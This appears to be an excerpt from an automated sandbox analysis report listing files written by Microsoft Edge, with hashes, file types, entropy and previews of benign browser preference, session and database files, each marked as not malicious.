                                                                                                                                                                                    SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                    Entropy (8bit):0.36515621748816035
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                                    MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                                    SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                                    SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                                    SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):111
                                                                                                                                                                                    Entropy (8bit):4.718418993774295
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                                    MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                                    SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                                    SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                                    SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                    Entropy (8bit):0.5744102022039023
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isCHIrdNG7fdjxHIXOFSY:TLiOUOq0afDdWec9sJKG7zo7J5fc
                                                                                                                                                                                    MD5:8B7CCBAE5FB8F1D3FDB331AED0833FB0
                                                                                                                                                                                    SHA1:7924CE8D7CF818F1132F1C8A047FBEEF13F18877
                                                                                                                                                                                    SHA-256:8029C4EAA75734867C5970AB41422A7F551EBFDF65E152C09F8A4038B17080C8
                                                                                                                                                                                    SHA-512:23B07F98E037ECC9BAAB37EA93264503B936CA180F4873D19944D186F3529926CBDC7A0962E7A51EADC8CEB2CA85D94BFC3C431D0068B8320C45BF24C0DDB163
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):12454
                                                                                                                                                                                    Entropy (8bit):5.074987217984796
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:sVgJ9pQTryZiuaba4uylJFjaYWs8/pj+FDlQAy4b1f:sVgLAJu6JFjgpUJQbI
                                                                                                                                                                                    MD5:A044EDA312E06B101E64AB0DCAB634C3
                                                                                                                                                                                    SHA1:6A0234D0A07B23BD1C910C3D628B82B0E7AA2DC1
                                                                                                                                                                                    SHA-256:C82540242E3786134FB78038C53A44F40B9B995C4AB4B0B9CEE031CF5E171A71
                                                                                                                                                                                    SHA-512:78DA8258245F34A6301D6406DF273BD92610674DB80D82FE82F6A11EE76866DC405ED3037F4E6A8DD1C11AD3CBDEC8F9AB9C24505E93866B268AD37D09AA5AD2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380906601968903","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):12454
                                                                                                                                                                                    Entropy (8bit):5.074987217984796
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:sVgJ9pQTryZiuaba4uylJFjaYWs8/pj+FDlQAy4b1f:sVgLAJu6JFjgpUJQbI
                                                                                                                                                                                    MD5:A044EDA312E06B101E64AB0DCAB634C3
                                                                                                                                                                                    SHA1:6A0234D0A07B23BD1C910C3D628B82B0E7AA2DC1
                                                                                                                                                                                    SHA-256:C82540242E3786134FB78038C53A44F40B9B995C4AB4B0B9CEE031CF5E171A71
                                                                                                                                                                                    SHA-512:78DA8258245F34A6301D6406DF273BD92610674DB80D82FE82F6A11EE76866DC405ED3037F4E6A8DD1C11AD3CBDEC8F9AB9C24505E93866B268AD37D09AA5AD2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380906601968903","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):12454
                                                                                                                                                                                    Entropy (8bit):5.074987217984796
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:sVgJ9pQTryZiuaba4uylJFjaYWs8/pj+FDlQAy4b1f:sVgLAJu6JFjgpUJQbI
                                                                                                                                                                                    MD5:A044EDA312E06B101E64AB0DCAB634C3
                                                                                                                                                                                    SHA1:6A0234D0A07B23BD1C910C3D628B82B0E7AA2DC1
                                                                                                                                                                                    SHA-256:C82540242E3786134FB78038C53A44F40B9B995C4AB4B0B9CEE031CF5E171A71
                                                                                                                                                                                    SHA-512:78DA8258245F34A6301D6406DF273BD92610674DB80D82FE82F6A11EE76866DC405ED3037F4E6A8DD1C11AD3CBDEC8F9AB9C24505E93866B268AD37D09AA5AD2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380906601968903","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):12454
                                                                                                                                                                                    Entropy (8bit):5.074987217984796
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:sVgJ9pQTryZiuaba4uylJFjaYWs8/pj+FDlQAy4b1f:sVgLAJu6JFjgpUJQbI
                                                                                                                                                                                    MD5:A044EDA312E06B101E64AB0DCAB634C3
                                                                                                                                                                                    SHA1:6A0234D0A07B23BD1C910C3D628B82B0E7AA2DC1
                                                                                                                                                                                    SHA-256:C82540242E3786134FB78038C53A44F40B9B995C4AB4B0B9CEE031CF5E171A71
                                                                                                                                                                                    SHA-512:78DA8258245F34A6301D6406DF273BD92610674DB80D82FE82F6A11EE76866DC405ED3037F4E6A8DD1C11AD3CBDEC8F9AB9C24505E93866B268AD37D09AA5AD2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380906601968903","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):33
                                                                                                                                                                                    Entropy (8bit):4.051821770808046
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YVXADAEvTLSJ:Y9AcEvHSJ
                                                                                                                                                                                    MD5:2B432FEF211C69C745ACA86DE4F8E4AB
                                                                                                                                                                                    SHA1:4B92DA8D4C0188CF2409500ADCD2200444A82FCC
                                                                                                                                                                                    SHA-256:42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
                                                                                                                                                                                    SHA-512:948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"preferred_apps":[],"version":1}
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):34462
                                                                                                                                                                                    Entropy (8bit):5.5582325612779835
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:zmjON5WPkSfvg8F1+UoAYDCx9Tuqh0VfUC9xbog/OVuV10Prwd1yrDdKpMtuZ:zmjON5WPkSfvgu1javb08d1yFltG
                                                                                                                                                                                    MD5:178DD4A7D6CEC8F33DA188793481D250
                                                                                                                                                                                    SHA1:015B4335C412171006D7A14C3F9E9B44A63DFDBA
                                                                                                                                                                                    SHA-256:80C91E0D021BD213879FA247402FC0D0CB071979FF20D505FDD6B9981065B0D5
                                                                                                                                                                                    SHA-512:167113CE9F604CC6BB67032D8601239AEDB8AC1DC026E0D2CB7CF79A085F8D7561D09BF8D07030233470A1A35F12E84BF4483564A24413D3515E9A227D3F0A96
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380906601312016","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380906601312016","location":5,"ma
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):34462
                                                                                                                                                                                    Entropy (8bit):5.5582325612779835
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:zmjON5WPkSfvg8F1+UoAYDCx9Tuqh0VfUC9xbog/OVuV10Prwd1yrDdKpMtuZ:zmjON5WPkSfvgu1javb08d1yFltG
                                                                                                                                                                                    MD5:178DD4A7D6CEC8F33DA188793481D250
                                                                                                                                                                                    SHA1:015B4335C412171006D7A14C3F9E9B44A63DFDBA
                                                                                                                                                                                    SHA-256:80C91E0D021BD213879FA247402FC0D0CB071979FF20D505FDD6B9981065B0D5
                                                                                                                                                                                    SHA-512:167113CE9F604CC6BB67032D8601239AEDB8AC1DC026E0D2CB7CF79A085F8D7561D09BF8D07030233470A1A35F12E84BF4483564A24413D3515E9A227D3F0A96
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380906601312016","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380906601312016","location":5,"ma
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):34462
                                                                                                                                                                                    Entropy (8bit):5.5582325612779835
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:zmjON5WPkSfvg8F1+UoAYDCx9Tuqh0VfUC9xbog/OVuV10Prwd1yrDdKpMtuZ:zmjON5WPkSfvgu1javb08d1yFltG
                                                                                                                                                                                    MD5:178DD4A7D6CEC8F33DA188793481D250
                                                                                                                                                                                    SHA1:015B4335C412171006D7A14C3F9E9B44A63DFDBA
                                                                                                                                                                                    SHA-256:80C91E0D021BD213879FA247402FC0D0CB071979FF20D505FDD6B9981065B0D5
                                                                                                                                                                                    SHA-512:167113CE9F604CC6BB67032D8601239AEDB8AC1DC026E0D2CB7CF79A085F8D7561D09BF8D07030233470A1A35F12E84BF4483564A24413D3515E9A227D3F0A96
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380906601312016","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380906601312016","location":5,"ma
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):414
                                                                                                                                                                                    Entropy (8bit):4.171545261349328
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:S+a8ljljljljljljldTl65gnqq/WDL3TSlkTSlkTSlkT:Ra0ZZZZZZf65gnqq/WW99
                                                                                                                                                                                    MD5:5AA45317C2CC3AACF3D12FCE32D672FD
                                                                                                                                                                                    SHA1:B075AB0623300795978C06A66D72B21B9FA70672
                                                                                                                                                                                    SHA-256:5737B0F4E9C1F51203AA0F339D6EF6070D12D68C5227ECAEFFBA4DD00C2CFBE6
                                                                                                                                                                                    SHA-512:AEC4E4ACF85B01C2FDE904FAC8D7CC7B6318EC7A2863D60948D1AAA31BE046F5A1F2C514B8E9C977881D53B91B5CEBE884A3FE4C119E7BFD16BBED19B81726CD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f...............$..Ll................next-map-id.1.Mnamespace-9f003cb4_bd15_4f0c_b11c_0fae8b96c6ee-https://copilot.microsoft.com/.0..Xo)................map-0-i18next.translate.boo2B.l...............2B.l...............2B.l...............2B.l...............
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):322
                                                                                                                                                                                    Entropy (8bit):5.095816348680652
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:iOrPQ+q2Pwkn23oH+TcwtrQMxIFUtJx0gZmwPic7QVkwOwkn23oH+TcwtrQMFLJ:78+vYfYebCFUtV/N0V5JfYebtJ
                                                                                                                                                                                    MD5:43FBC68E6F5D685F3A57579013002863
                                                                                                                                                                                    SHA1:B1F741DC4FD321FB68602EED562384504446580D
                                                                                                                                                                                    SHA-256:D38FD107BE1B70744782243127E49C6638CEE1B3EF2DF445538F1C6BAAB60831
                                                                                                                                                                                    SHA-512:83A2BA2AE33A45B125C33AC186DE34E79B53FF9C88FD6D51C73AA0A6BDA02A8CE032016890E6817D26AD642BE85EDEBEF4275CDE510FCBDC11CBB7349A1E34EF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:02.408 13dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/09-09:30:02.409 13dc Recovering log #3.2025/01/09-09:30:02.411 13dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):322
                                                                                                                                                                                    Entropy (8bit):5.095816348680652
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:iOrPQ+q2Pwkn23oH+TcwtrQMxIFUtJx0gZmwPic7QVkwOwkn23oH+TcwtrQMFLJ:78+vYfYebCFUtV/N0V5JfYebtJ
                                                                                                                                                                                    MD5:43FBC68E6F5D685F3A57579013002863
                                                                                                                                                                                    SHA1:B1F741DC4FD321FB68602EED562384504446580D
                                                                                                                                                                                    SHA-256:D38FD107BE1B70744782243127E49C6638CEE1B3EF2DF445538F1C6BAAB60831
                                                                                                                                                                                    SHA-512:83A2BA2AE33A45B125C33AC186DE34E79B53FF9C88FD6D51C73AA0A6BDA02A8CE032016890E6817D26AD642BE85EDEBEF4275CDE510FCBDC11CBB7349A1E34EF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:02.408 13dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/09-09:30:02.409 13dc Recovering log #3.2025/01/09-09:30:02.411 13dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):5993
                                                                                                                                                                                    Entropy (8bit):3.7730983195808734
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:3lgaRbwxeIDPRDXRXxeDHu/RhwknEeH3IMOGnE:3l7aIIDPZ1IDO/wc3i
                                                                                                                                                                                    MD5:F0FC967CB375A874E83970066FA53A0B
                                                                                                                                                                                    SHA1:EA61EF1FB0A40C72A7AAC5CC6C03923B7934F8FF
                                                                                                                                                                                    SHA-256:8E5322492FF3257BA6370C22A72CB5E8ADA1C7C77930BBB1315ED4607734EB05
                                                                                                                                                                                    SHA-512:49ADDA717373745921CDC61366C22A122133884C852DFD04E6D2D99ED9363D62F09D88E4228A4108F154CC3A373F4965126BD019456571BDAE153175B25BB7A9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SNSS.......O.o!...........O.o!......"O.o!...........O.o!.......O.o!.......P.o!.......P.o!....!..P.o!...............................O.o!P.o!1..,...P.o!$...9f003cb4_bd15_4f0c_b11c_0fae8b96c6ee...O.o!.......P.o!...............O.o!...O.o!.......................O.o!....................5..0...O.o!&...{1A5CCF63-1000-409F-B5C1-AFEC7F75D4D9}.....O.o!.......O.o!..........................P.o!....Q..L...P.o!........https://copilot.microsoft.com/?form=WSBSH1&cvid=b374da154d8a4e3bb912f43f50eaafd2&nclid=4C9C2B2D0465FD7A42C74C7E93CFB630&ts=1736433000464&nclidts=1736433000&tsms=464&showconv=1.............!.......................................................................................................2?}.F+..3?}.F+..0.......H...............@.......................................................f.......h.t.t.p.s.:././.c.o.p.i.l.o.t...m.i.c.r.o.s.o.f.t...c.o.m./.?.f.o.r.m.=.W.S.B.S.H.1.&.c.v.i.d.=.b.3.7.4.d.a.1.5.4.d.8.a.4.e.3.b.b.9.1.2.f.4.3.f.5.0.e.a.a.f.d.2.&.n.c.l.i.d.=.4.C.9.C.2.B.2.D.0.4.6.5
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
